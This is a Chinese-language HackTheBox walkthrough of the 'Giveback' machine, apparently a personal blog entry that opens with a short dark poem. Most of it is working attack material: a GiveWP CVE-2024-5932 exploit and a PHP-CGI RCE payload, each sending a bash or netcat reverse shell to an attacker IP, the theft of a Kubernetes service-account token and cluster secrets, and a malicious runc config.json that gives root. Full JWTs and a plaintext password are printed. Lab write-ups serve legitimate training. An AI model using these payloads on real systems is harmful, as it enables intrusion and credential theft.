HackTheBox-Giveback

做了一个掐住你脖子的梦

️在阳光正好的午后

️用眼泪仿佛快夺眶而出的双眼

看着你纤细的头颈抽搐着

---

信息收集

 ./rustscan -a 10.10.11.94 --ulimit 5000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.94:22
Open 10.10.11.94:80
Open 10.10.11.94:30686
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-17 19:03 EST
Initiating Ping Scan at 19:03
Scanning 10.10.11.94 [4 ports]
Completed Ping Scan at 19:03, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:03
Completed Parallel DNS resolution of 1 host. at 19:03, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:03
Scanning 10.10.11.94 [3 ports]
Discovered open port 80/tcp on 10.10.11.94
Discovered open port 22/tcp on 10.10.11.94
Discovered open port 30686/tcp on 10.10.11.94
Completed SYN Stealth Scan at 19:03, 0.16s elapsed (3 total ports)
Nmap scan report for 10.10.11.94
Host is up, received echo-reply ttl 63 (0.095s latency).
Scanned at 2025-11-17 19:03:40 EST for 0s

PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack ttl 63
80/tcp    open  http    syn-ack ttl 62
30686/tcp open  unknown syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
           Raw packets sent: 7 (284B) | Rcvd: 4 (160B)

 docker run -it --rm wpscanteam/wpscan --url http://10.10.11.94/              
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://10.10.11.94/ [10.10.11.94]
[+] Started: Tue Nov 18 00:35:03 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.28.0
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://10.10.11.94/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] WordPress readme found: http://10.10.11.94/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 6.8.1 identified (Insecure, released on 2025-04-30).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://10.10.11.94/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.8.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://10.10.11.94/, Match: 'WordPress 6.8.1'

[+] WordPress theme in use: bizberg
 | Location: http://10.10.11.94/wp-content/themes/bizberg/
 | Latest Version: 4.2.9.79 (up to date)
 | Last Updated: 2024-06-09T00:00:00.000Z
 | Readme: http://10.10.11.94/wp-content/themes/bizberg/readme.txt
 | Style URL: http://10.10.11.94/wp-content/themes/bizberg/style.css?ver=6.8.1
 | Style Name: Bizberg
 | Style URI: https://bizbergthemes.com/downloads/bizberg-lite/
 | Description: Bizberg is a perfect theme for your business, corporate, restaurant, ingo, ngo, environment, nature,...
 | Author: Bizberg Themes
 | Author URI: https://bizbergthemes.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 4.2.9.79 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.11.94/wp-content/themes/bizberg/style.css?ver=6.8.1, Match: 'Version: 4.2.9.79'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] *
 | Location: http://10.10.11.94/wp-content/plugins/*/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | The version could not be determined.

[+] give
 | Location: http://10.10.11.94/wp-content/plugins/give/
 | Last Updated: 2025-11-05T14:00:00.000Z
 | [!] The version is out of date, the latest version is 4.13.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By:
 |  Urls In 404 Page (Passive Detection)
 |  Meta Tag (Passive Detection)
 |  Javascript Var (Passive Detection)
 |
 | Version: 3.14.0 (100% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - http://10.10.11.94/wp-content/plugins/give/assets/dist/css/give.css?ver=3.14.0
 | Confirmed By:
 |  Meta Tag (Passive Detection)
 |   - http://10.10.11.94/, Match: 'Give v3.14.0'
 |  Javascript Var (Passive Detection)
 |   - http://10.10.11.94/, Match: '"1","give_version":"3.14.0","magnific_options"'

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:17 <============================================================================> (137 / 137) 100.00% Time: 00:00:17

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Nov 18 00:35:28 2025
[+] Requests Done: 173
[+] Cached Requests: 7
[+] Data Sent: 42.972 KB
[+] Data Received: 290.97 KB
[+] Memory used: 272.395 MB
[+] Elapsed time: 00:00:24

GetShell1

---

爆破用户名无果，选择从插件分析，WPgive插件是低版本，存在可利用的CVE。

EQSTLab/CVE-2024-5932: GiveWP PHP Object Injection exploit

python3 CVE-2024-5932-rce.py -u "http://giveback.htb/donations/the-things-we-need/" -c "bash -c 'bash -i >& /dev/tcp/10.10.16.20/4444 0>&1'"

➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from beta-vino-wp-wordpress-685554584c-sq2j9-10.10.11.94-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[!] Python agent cannot be deployed. I need to maintain at least one basic session to handle the PTY
[+] Attempting to spawn a reverse shell on 10.10.16.20:4444
[+] Got reverse shell from beta-vino-wp-wordpress-685554584c-sq2j9-10.10.11.94-Linux-x86_64 😍 Assigned SessionID <2>
[+] Shell upgraded successfully using /usr/bin/script! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12 
[+] Logging to /root/.penelope/beta-vino-wp-wordpress-685554584c-sq2j9~10.10.11.94_Linux_x86_64/2025_11_17-19_45_05-633.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
id
uid=1001 gid=0(root) groups=0(root),1001
I have no name!@beta-vino-wp-wordpress-685554584c-sq2j9:/opt/bitnami/wordpress/wp-admin$ 

不是我说，直接root？

肯定是个虚拟机。

I have no name!@beta-vino-wp-wordpress-685554584c-sq2j9:/opt/bitnami/wordpress/wp-admin$ env
SHELL=/usr/bin/bash
BETA_VINO_WP_MARIADB_SERVICE_PORT=3306
KUBERNETES_SERVICE_PORT_HTTPS=443
WORDPRESS_SMTP_PASSWORD=
WORDPRESS_SMTP_FROM_EMAIL=
BETA_VINO_WP_WORDPRESS_PORT_443_TCP_PORT=443
WEB_SERVER_HTTP_PORT_NUMBER=8080
WORDPRESS_RESET_DATA_PERMISSIONS=no
KUBERNETES_SERVICE_PORT=443
WORDPRESS_EMAIL=user@example.com
WP_CLI_CONF_FILE=/opt/bitnami/wp-cli/conf/wp-cli.yml
WORDPRESS_DATABASE_HOST=beta-vino-wp-mariadb
MARIADB_PORT_NUMBER=3306
MODULE=wordpress
WORDPRESS_SMTP_FROM_NAME=FirstName LastName
HOSTNAME=beta-vino-wp-wordpress-685554584c-sq2j9
WORDPRESS_SMTP_PORT_NUMBER=
BETA_VINO_WP_MARIADB_PORT_3306_TCP_PROTO=tcp
WORDPRESS_EXTRA_CLI_ARGS=
APACHE_BASE_DIR=/opt/bitnami/apache
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PORT=5000
APACHE_VHOSTS_DIR=/opt/bitnami/apache/conf/vhosts
WEB_SERVER_DEFAULT_HTTP_PORT_NUMBER=8080
WP_NGINX_SERVICE_PORT_80_TCP=tcp://10.43.4.242:80
WORDPRESS_ENABLE_DATABASE_SSL=no
WP_NGINX_SERVICE_PORT_80_TCP_PROTO=tcp
APACHE_DAEMON_USER=daemon
BITNAMI_ROOT_DIR=/opt/bitnami
LEGACY_INTRANET_SERVICE_SERVICE_HOST=10.43.2.241
WORDPRESS_BASE_DIR=/opt/bitnami/wordpress
WORDPRESS_SCHEME=http
WORDPRESS_LOGGED_IN_SALT=
BETA_VINO_WP_WORDPRESS_PORT_80_TCP=tcp://10.43.61.204:80
WORDPRESS_DATA_TO_PERSIST=wp-config.php wp-content
WORDPRESS_HTACCESS_OVERRIDE_NONE=no
WORDPRESS_DATABASE_SSL_CERT_FILE=
APACHE_HTTPS_PORT_NUMBER=8443
PWD=/opt/bitnami/wordpress/wp-admin
OS_FLAVOUR=debian-12
WORDPRESS_SMTP_PROTOCOL=
WORDPRESS_CONF_FILE=/opt/bitnami/wordpress/wp-config.php
LEGACY_INTRANET_SERVICE_PORT_5000_TCP=tcp://10.43.2.241:5000

内部开放了很多端口，还有KUBERNETES，推测是个k8s集群。

先去5000端口看看。

我的天这b容器啥命令都不给用啊，先看看内网服务。

I have no name!@beta-vino-wp-wordpress-685554584c-sq2j9:/tmp$ cat /etc/hosts
# Kubernetes-managed hosts file.
127.0.0.1       localhost
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
fe00::0 ip6-mcastprefix
fe00::1 ip6-allnodes
fe00::2 ip6-allrouters
10.42.1.249     beta-vino-wp-wordpress-685554584c-sq2j9

# Entries added by HostAliases.
127.0.0.1       status.localhost

这里采用Enchanter师傅提供的传输方法。

kali：

nc -lvnp 9999 < socat-linux-amd64 

受害机器：

I have no name!@beta-vino-wp-wordpress-685554584c-sq2j9:/tmp$ exec 3<>/dev/tcp/10.10.16.20/9999 
I have no name!@beta-vino-wp-wordpress-685554584c-sq2j9:/tmp$ cat <&3 > socat
I have no name!@beta-vino-wp-wordpress-685554584c-sq2j9:/tmp$ exec 3>&-

之后顺利使用socat将端口转发到外网。

GetShell2

---

提到了php-cgi，这里可以利用一下再反弹一个shell

PHP CGI Module 8.3.4 - Remote Code Execution (RCE) - PHP webapps Exploit

php -r '$p="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.20 9999 > /tmp/f"; $o = ["http"=>["method"=>"POST", "header"=>"Content-Type: application/x-www-form-urlencoded","content"=>$p,"timeout"=>4]]; $c=stream_context_create($o); $r=@file_get_contents("http://legacy-intranet-service:5000/cgi-bin/php-cgi?--define+allow_url_include%3don+--define+auto_prepend_file%3dphp://input",false,$c); echo $r===false?"":substr($r,0,5000);'

 ./penelope.py 9999
[+] Listening for reverse shells on 0.0.0.0:9999 →  127.0.0.1 • 192.168.21.128 • 172.18.0.1 • 172.17.0.1 • 10.10.16.20
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from legacy-intranet-cms-6f7bf5db84-jm6bz-10.10.11.94-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[!] Python agent cannot be deployed. I need to maintain at least one basic session to handle the PTY
[+] Attempting to spawn a reverse shell on 10.10.16.20:9999
[+] Got reverse shell from legacy-intranet-cms-6f7bf5db84-jm6bz-10.10.11.94-Linux-x86_64 😍 Assigned SessionID <2>
[+] Shell upgraded successfully using /usr/bin/script! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12 
[+] Logging to /root/.penelope/legacy-intranet-cms-6f7bf5db84-jm6bz~10.10.11.94_Linux_x86_64/2025_11_17-20_15_58-173.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
/var/www/html/cgi-bin # 
/var/www/html/cgi-bin # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

第二个虚拟机

这里需要看一下k8s的相关文档。

Kubernetes Enumeration - HackTricks Cloud

先找到token，一般是这个默认路径。

/run/secrets/kubernetes.io/serviceaccount # ls -al
total 4
drwxrwxrwt    3 root     root           140 Nov 18 00:24 .
drwxr-xr-x    3 root     root          4096 Nov 18 00:52 ..
drwxr-xr-x    2 root     root           100 Nov 18 00:24 ..2025_11_18_00_24_59.298758859
lrwxrwxrwx    1 root     root            31 Nov 18 00:24 ..data -> ..2025_11_18_00_24_59.298758859
lrwxrwxrwx    1 root     root            13 Nov 17 19:33 ca.crt -> ..data/ca.crt
lrwxrwxrwx    1 root     root            16 Nov 17 19:33 namespace -> ..data/namespace
lrwxrwxrwx    1 root     root            12 Nov 17 19:33 token -> ..data/token
/run/secrets/kubernetes.io/serviceaccount # cat token 
eyJhbGciOiJSUzI1NiIsImtpZCI6Inp3THEyYUhkb19sV3VBcGFfdTBQa1c1S041TkNiRXpYRS11S0JqMlJYWjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiLCJrM3MiXSwiZXhwIjoxNzk0OTYxNDk5LCJpYXQiOjE3NjM0MjU0OTksImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiZDQ2ZjM5Y2QtMjgyZi00MzU4LWI0M2YtZTBmZmE0YTQ0MWE2Iiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0Iiwibm9kZSI6eyJuYW1lIjoiZ2l2ZWJhY2suaHRiIiwidWlkIjoiMTJhOGE5Y2YtYzM1Yi00MWYzLWIzNWEtNDJjMjYyZTQzMDQ2In0sInBvZCI6eyJuYW1lIjoibGVnYWN5LWludHJhbmV0LWNtcy02ZjdiZjVkYjg0LWptNmJ6IiwidWlkIjoiYjg0NGI4MDctMGIyMS00NWQ1LWJhNmYtODIxZmM1ZTFlN2RkIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJzZWNyZXQtcmVhZGVyLXNhIiwidWlkIjoiNzJjM2YwYTUtOWIwOC00MzhhLWEzMDctYjYwODc0NjM1YTlhIn0sIndhcm5hZnRlciI6MTc2MzQyOTEwNn0sIm5iZiI6MTc2MzQyNTQ5OSwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6c2VjcmV0LXJlYWRlci1zYSJ9.PvzmCQj3JKPg7hksaCIQE6vPYwWk-vG_vAuqZpvYjQ-lMdgwDyd2wtJN4BVnobAcMJvPzinwkJZ4eKyvSO3NV9x64fgokfh9Iq33CtA-DnetRd0ERSdVxXkMryihWyZuo8ODOBk2YkH0VyTrENVdvqnkN_qZzeMKZTC7zs1XgHLgl-zZKH6urFQZi6PKdpkIj4r4TOnHfl98A7vaxvbY0CSgNXhR6m4yZUxQvW0-XUErPU7kPRa1Qqhl9i6sJ0L6kzRAR_qEwEAlP3Z3a6bQOBy92UpUISZrdQ_7EkUUdqtopRIe-p1tuhP0rhDmR0YoJiXRb-QsTTF9SdGJHtAoGw/run/secrets/kubernetes.io/serviceaccount # 

之后再找到本地的k8s端口

ubernetes.io/serviceaccount # env
KUBERNETES_PORT=tcp://10.43.0.1:443
KUBERNETES_SERVICE_PORT=443
HOSTNAME=legacy-intranet-cms-6f7bf5db84-jm6bz

Token=eyJhbGciOiJSUzI1NiIsImtpZCI6Inp3THEyYUhkb19sV3VBcGFfdTBQa1c1S041TkNiRXpYRS11S0JqMlJYWjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiLCJrM3MiXSwiZXhwIjoxNzk0OTYxNDgyLCJpYXQiOjE3NjM0MjU0ODIsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiOWY1M2JkZTEtYTYzZS00ZjZmLTg4ODQtZWMyZDc1NTkwYTE4Iiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0Iiwibm9kZSI6eyJuYW1lIjoiZ2l2ZWJhY2suaHRiIiwidWlkIjoiMTJhOGE5Y2YtYzM1Yi00MWYzLWIzNWEtNDJjMjYyZTQzMDQ2In0sInBvZCI6eyJuYW1lIjoibGVnYWN5LWludHJhbmV0LWNtcy02ZjdiZjVkYjg0LWxmdzdsIiwidWlkIjoiMzM3ODUxY2QtYTM2NS00NmU2LTk4MDAtZTJhYzdlMWUyZmIyIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJzZWNyZXQtcmVhZGVyLXNhIiwidWlkIjoiNzJjM2YwYTUtOWIwOC00MzhhLWEzMDctYjYwODc0NjM1YTlhIn0sIndhcm5hZnRlciI6MTc2MzQyOTA4OX0sIm5iZiI6MTc2MzQyNTQ4Miwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6c2VjcmV0LXJlYWRlci1zYSJ9.S_jH6qKcVUzi6fm8ZDb20TQnHhQZIZltOukgp4TpoEWsi9mbscb37ds-RoOfPWcOzG-V93Hl7hRsd_f67wFfs6KCvxLaZWnYuQhTIJtm2xMfyBG4O1w2Voi4xhMSjNTG_yRMC1AvM-i3v05oTH1s2K-1wehLEF4JDFtaw27iVKIBKEsrejzObJ9tWe7oBO4h5I-UztaPAMK6jehcFiWacH5MwvAB0xC6NG6xGttBtaecu1fXOFh6Ryr0l03oITzFwxyyPfkAFnadpOxeVY6X_I7Tv5kKigYAKkarAyXf2HxUOprIxwmI2JS3o2F_Vj5lW0sG1oTfcBkAZmznZec9yw
BETA_VINO_WP_WORDPRESS_PORT_443_TCP_PORT=443
BETA_VINO_WP_WORDPRESS_PORT_443_TCP_PROTO=tcp
SHELL=/bin/sh
BETA_VINO_WP_WORDPRESS_SERVICE_PORT_HTTP=80
WP_NGINX_SERVICE_SERVICE_PORT_HTTP=80
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_PORT_443_TCP=tcp://10.43.0.1:443
PHPIZE_DEPS=autoconf            dpkg-dev dpkg           file            g++             gcc             libc-dev                make            pkgconf   re2c
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_ADDR=10.43.2.241
KUBERNETES_SERVICE_HOST=10.43.0.1
PWD=/var/www/html/cgi-bin
PHP_SHA256=b0a996276fe21fe9ca8f993314c8bc02750f464c7b0343f056fb0894a8dfa9d1
BETA_VINO_WP_WORDPRESS_PORT_443_TCP=tcp://10.43.61.204:443
BETA_VINO_WP_WORDPRESS_SERVICE_PORT_HTTPS=443
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PORT=5000
BETA_VINO_WP_WORDPRESS_SERVICE_HOST=10.43.61.204
WP_NGINX_SERVICE_SERVICE_HOST=10.43.4.242
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PROTO=tcp
LEGACY_INTRANET_SERVICE_SERVICE_PORT_HTTP=5000
/var/www/html/cgi-bin # curl -k -H "Authorization: Bearer $Token" https://10.43.0.1:443/api/v1/namespaces/default/secrets

  "metadata": {
        "name": "user-secret-babywyrm",
        "namespace": "default",
        "uid": "43c29d37-1f8d-4958-a077-045068e46db2",
        "resourceVersion": "2857705",
        "creationTimestamp": "2025-11-17T19:33:24Z",
        "ownerReferences": [
          {
            "apiVersion": "bitnami.com/v1alpha1",
            "kind": "SealedSecret",
            "name": "user-secret-babywyrm",
            "uid": "af0b09ab-723f-4b29-99ff-808c7fbd1fc6",
            "controller": true
          }
        ],
        "managedFields": [
},
      "data": {
        "MASTERPASS": "VlNPQW02T3JMMUJ5WjJmOEs4OU5JTldmRG55TUhldQ==

"
      },
      "type": "Opaque"
    }
  ]

Getbabywyrm

---

得到用户babywyrm以及base64加密过的密码

使用ssh成功登录

 ssh babywyrm@10.10.11.94
The authenticity of host '10.10.11.94 (10.10.11.94)' can't be established.
ED25519 key fingerprint is SHA256:QW0UEukNwOzzXzOIYR311JYiuhYUEv8FYbRgwiKZ35g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.94' (ED25519) to the list of known hosts.
babywyrm@10.10.11.94's password: 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-124-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Tue Nov 18 01:16:40 2025 from 10.10.16.20
babywyrm@giveback:~$ cat user.txt 

babywyrm@giveback:~$ sudo -l
Matching Defaults entries for babywyrm on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, timestamp_timeout=0,
    timestamp_timeout=20

User babywyrm may run the following commands on localhost:
    (ALL) NOPASSWD: !ALL
    (ALL) /opt/debug

但是这里执行sudo还需要什么管理员密码

babywyrm@giveback:~$ sudo /opt/debug
[sudo] password for babywyrm: 
[*] Validating sudo privileges...
[*] Sudo validation successful
Please enter the administrative password: 

Error: Incorrect administrative password

到处试来试去找不到。。。

Root

---

最后发现是wp-config里的密码

sW5sp4spa3u7RLyetrekE4oS

babywyrm@giveback:/tmp$ sudo /opt/debug --help
[*] Validating sudo privileges...
[*] Sudo validation successful
Please enter the administrative password: 

[*] Administrative password verified
[*] Processing command: --help
Restricted runc Debug Wrapper

Usage:
  /opt/debug [flags] spec
  /opt/debug [flags] run <id>
  /opt/debug version | --version | -v

Flags:
  --log <file>
  --root <path>
  --debug

babywyrm@giveback:/$ sudo /opt/debug -v
[*] Validating sudo privileges...
[*] Sudo validation successful
Please enter the administrative password: 

[*] Administrative password verified
[*] Processing command: -v
runc version 1.1.11
commit: v1.1.11-0-g4bccb38c
spec: 1.0.2-dev
go: go1.20.12
libseccomp: 2.5.4

runc系列（2）——specification(config.json)文件详解_容器config.json的资源配置-CSDN博客

参考这篇文章创建恶意config文件提权。

babywyrm@giveback:/tmp/pwn$ cat config.json 
{
    "ociVersion": "1.0.2-dev",
    "process": {
        "terminal": true,
        "user": {
            "uid": 0,
            "gid": 0
        },
        "args": [
            "sh"
        ],
        "env": [
            "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
            "TERM=xterm"
        ],
        "cwd": "/",
        "rlimits": [
            {
                "type": "RLIMIT_NOFILE",
                "hard": 1024,
                "soft": 1024
            }
        ]
    },
    "root": {
        "path": "/",
        "readonly": false
    },
    "mounts": [],
    "linux": {
        "resources": {
            "devices": [
                {
                    "allow": true,
                    "access": "rwm"
                }
            ]
        },
        "namespaces": []
    }
}

babywyrm@giveback:~$ mkdir -p root/rootfs
babywyrm@giveback:~$ cd root/
babywyrm@giveback:~/root$ vim config.json
babywyrm@giveback:~/root$ sudo /opt/debug run test
[*] Validating sudo privileges...
[*] Sudo validation successful
Please enter the administrative password: 

[*] Administrative password verified
[*] Processing command: run
[*] Starting container: test
babywyrm@giveback:~/root$ /tmp/root bash -p
rootbash-5.1# id
uid=1000(babywyrm) gid=1000(babywyrm) euid=0(root) groups=1000(babywyrm)